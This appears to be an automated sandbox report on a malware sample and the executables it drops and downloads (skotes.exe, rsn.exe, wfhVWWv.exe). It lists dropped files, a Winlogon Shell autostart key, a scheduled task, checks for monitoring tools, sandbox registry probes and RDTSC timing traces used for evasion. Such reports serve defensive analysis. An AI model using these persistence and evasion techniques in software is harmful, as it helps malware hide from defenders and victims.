Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\pywintypes27.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mfc90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_pytransform.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\win32event.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\rsn[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\pythoncom27.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mpc\41678903251236549780	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\wfhVWWv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\win32process.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\msvcm90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\msvcp90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\python27.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ecb.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mpc\41678903251236549780

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Code function: 8_2_00182B70 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00182B70

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_2-9720

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51C0FD second address: 51C122 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124CF45B0h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F8124CF45A8h 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B0A2 second address: 51B0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B0AA second address: 51B0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B0B1 second address: 51B0C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B0C2 second address: 51B0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8124CF459Ch 0x00000012 jo 00007F8124CF4596h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B23C second address: 51B273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8124DF87D7h 0x0000000d jmp 00007F8124DF87D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B53B second address: 51B57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8124CF45A5h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8124CF459Bh 0x00000013 jmp 00007F8124CF45A4h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B809 second address: 51B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jg 00007F8124DF87D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8124DF87C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B9B0 second address: 51B9B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B9B4 second address: 51B9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8124DF87CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51B9C2 second address: 51B9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007F8124CF459Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D337 second address: 51D33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D33C second address: 39EACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4864B032h 0x00000010 push dword ptr [ebp+122D16F1h] 0x00000016 sub dword ptr [ebp+122D1FEAh], eax 0x0000001c call dword ptr [ebp+122D2066h] 0x00000022 pushad 0x00000023 jbe 00007F8124CF459Ch 0x00000029 mov dword ptr [ebp+122D1DCBh], ecx 0x0000002f xor eax, eax 0x00000031 jmp 00007F8124CF45A7h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007F8124CF45A7h 0x0000003f mov dword ptr [ebp+122D2C99h], eax 0x00000045 mov dword ptr [ebp+122D203Ch], edi 0x0000004b mov esi, 0000003Ch 0x00000050 sub dword ptr [ebp+122D1DCBh], eax 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F8124CF45A1h 0x0000005f xor dword ptr [ebp+122D1DCBh], edi 0x00000065 lodsw 0x00000067 jmp 00007F8124CF459Eh 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 add dword ptr [ebp+122D1DCBh], esi 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a cmc 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F8124CF45A3h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D467 second address: 51D47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F8124DF87CCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D525 second address: 51D52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D52B second address: 51D52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D52F second address: 51D533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D533 second address: 51D563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8124DF87D8h 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F8124DF87C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D563 second address: 51D5DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F8124CF45A8h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F8124CF45A6h 0x0000001a pop eax 0x0000001b or di, 9241h 0x00000020 push 00000003h 0x00000022 push edx 0x00000023 mov esi, ebx 0x00000025 pop ecx 0x00000026 push 00000000h 0x00000028 mov esi, 75E78B4Ch 0x0000002d push 00000003h 0x0000002f jmp 00007F8124CF459Eh 0x00000034 push FC868ED6h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007F8124CF4596h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D5DA second address: 51D5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D66C second address: 51D670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D746 second address: 51D74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D74B second address: 51D751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 51D751 second address: 51D76D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F8124DF87C6h 0x00000015 jc 00007F8124DF87C6h 0x0000001b popad 0x0000001c rdtsc
